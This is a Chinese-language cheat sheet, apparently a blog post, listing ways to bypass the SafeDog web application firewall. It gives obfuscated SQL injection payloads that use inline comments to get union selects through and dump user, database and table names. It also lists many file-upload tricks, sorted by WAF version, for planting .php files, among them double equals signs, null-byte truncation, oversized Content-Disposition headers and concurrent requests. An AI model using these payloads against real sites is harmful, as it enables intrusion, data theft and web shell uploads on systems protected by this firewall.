简单的过安全狗
1、SQL注入
1、And -1=-1 2、group by 3、union/*%!a*/select 1,2,3,4,5,6,7,8 或者 union/*!66666asdfsadfsdaf*/select 1,2,3,4,5,6,7,8 4、union/*!66666asdfsadfsdaf*/select 1,2,3,USER%0a/*!66666ASFSADF*/(),5,6,7,8 或者 union/*%!a*/select 1,2,3,database/*%!a*/(),5,6,7,8 5、union/*%!a*/select/*!34233user%0a/*%!a*/()*/,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema='baji' 或者union/*!66666asdfsadfsdaf*/select user/*!66666asdfsadfsdaf*/(),2,3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema='baji'
2、文件上传绕过安全狗
1,header'aa.php 单引号 2,filename=="php" 双等号 3,截断 4,特殊文件名filename="header.txt;.php" // 以下有几率成功 5,叹号文件名(!ash.php) 6, 修改content-type类型(video/mpeg) 7,Content-Disposition: form-dataxxxx;xxx位置超过466个字符。 8,Content-Disposition: form-data; name="uppic"xxxx; ;xxx位置超过466个字符。 9,filename=&"php" 等号后面加特殊字符空格和换行 ------------------------------------------以下方式可当成html执行--- 10,文件名为111.&php 11,filename=2342sdf.^php 12.filename=x.jpg() 可弹窗 12.filename=x.~jpg 可弹窗 上传成功:uploads/x.'php' 可弹窗 ------------------------------------ 1,单引号 xxx'xx.php 2,xxx.php.txt 抓包00截断 3,xxx.jpg;.php 特殊文件名绕过。 4,全角空格(截断的原理) 5,在数据包form-data:后面添加466个字符 6,双数据包, 复制请求主体,粘贴到下方,修改第一个主体的后缀名图片 (3.5不可绕过,4.0可绕过) 7,删除content-type或者Content-Disposition后面的空格 (3.5可绕过,4.0不可以) 8,修改Content-Disposition: form-data; name="pic"; filename=="2.jpg.php" (两个==绕4.0,三个=通吃) 9,修改name=pic(name为大写,3.5版本可以) 10,form-data(修改任意字符就可以绕过(3.5版本)) 11,filename="2.jpg.php" (去掉双引号4.0绕过) 12,并发访问让防护失效,可有机会上传. 13,filename="2.jpg.php"(去掉双引号+反引号`,4.0版本) -------------------------------------------------------------- safedog4.0 1,文件名字加单引号' 如:hack'.php 2, 在请求头中的Content-Disposion:修改filename为双等号==; filename=="lanou.txt.php" 3, 00截断绕过 4,文件名字加分号;如:hack;.php 5,Content-Disposion:长度超过指定大小,即可上传任何文件。 6,文件名.php前加个换行 -----------------------------------------------------------------

浙公网安备 33010602011771号